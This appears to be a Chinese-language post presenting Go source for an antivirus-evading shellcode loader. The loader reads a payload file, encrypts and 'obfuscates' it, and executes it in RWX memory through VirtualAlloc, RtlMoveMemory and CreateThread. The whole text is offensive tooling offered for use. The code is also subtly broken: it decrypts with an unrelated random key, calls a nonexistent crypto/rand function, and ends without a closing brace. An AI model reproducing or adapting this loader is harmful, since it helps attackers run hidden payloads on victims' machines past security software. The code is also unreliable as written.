Go 恶意代码免杀优化：动态加载与加密

package main

import ( "bytes" "crypto/aes" "crypto/cipher" "crypto/rand" "encoding/base64" "io/ioutil" "reflect" "syscall" "time" "unsafe" )

const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 )

var ( key []byte )

func init() { // 生成随机密钥 key = make([]byte, 32) if _, err := rand.Read(key); err != nil { panic(err) } }

type CipherFunc func(key []byte, src []byte) []byte

func AesCipher(key []byte, src []byte) []byte { block, _ := aes.NewCipher(key) iv := make([]byte, aes.BlockSize) stream := cipher.NewCTR(block, iv) dst := make([]byte, len(src)) stream.XORKeyStream(dst, src) return dst }

func Crypt(cipher CipherFunc, key []byte, src []byte) []byte { return cipher(key, src) }

func Encode(src string) string { payloadBytes := []byte(src) encodedBytes := Crypt(AesCipher, key, payloadBytes) bdata := base64.StdEncoding.EncodeToString(encodedBytes) return bdata }

func Decode(src string) []byte { decodedBytes, _ := base64.StdEncoding.DecodeString(src) payloadBytes := Crypt(AesCipher, key, decodedBytes) return payloadBytes }

var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") ntdll = syscall.NewLazyDLL("ntdll.dll") VirtualAlloc = kernel32.NewProc("VirtualAlloc") RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") CreateThread = kernel32.NewProc("CreateThread") )

func exec(charcode []byte) { addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) time.Sleep(5) _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) time.Sleep(5) handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0) time.Sleep(5) syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE) }

func readFile(filename string) []byte { data, _ := ioutil.ReadFile(filename) return data }

func main() { // 读取恶意代码文件 payload := string(readFile("./payload.bin"))

// 加密恶意代码
encodedPayload := Encode(payload)

// 将加密后的代码转换为字节数组
shellCodeBytes := []byte(encodedPayload)

// 随机生成字节数组，作为解密密钥
decodeKey := make([]byte, 32)
if _, err := rand.Read(decodeKey); err != nil {
	panic(err)
}

// 使用解密密钥对加密后的代码进行对称解密
block, err := aes.NewCipher(decodeKey)
if err != nil {
	panic(err)
}
iv := make([]byte, aes.BlockSize)
stream := cipher.NewCTR(block, iv)
dst := make([]byte, len(shellCodeBytes))
stream.XORKeyStream(dst, shellCodeBytes)

// 将解密后的字节数组进行混淆
obfuscateBytes := obfuscate(dst)

// 将解密密钥和混淆后的代码合并为一个字节数组
finalBytes := append(decodeKey, obfuscateBytes...)

// 获取函数指针
execFunc := reflect.ValueOf(exec)

// 将字节切片转换为 reflect.Value 类型
params := []reflect.Value{reflect.ValueOf(finalBytes)}

// 调用函数
execFunc.Call(params)

}

func obfuscate(data []byte) []byte { // 每个字节加上一个随机数 obfusedData := make([]byte, len(data)) for i, b := range data { obfusedData[i] = b + byte(rand.Intn(255)) }

// 将字节数组中的连续相同的字节替换为随机数
var buf bytes.Buffer
var last byte
for _, b := range obfusedData {
	if b == last {
		buf.WriteByte(byte(rand.Intn(255)))
	} else {
		buf.WriteByte(b)
		last = b
	}
}

return buf.Bytes()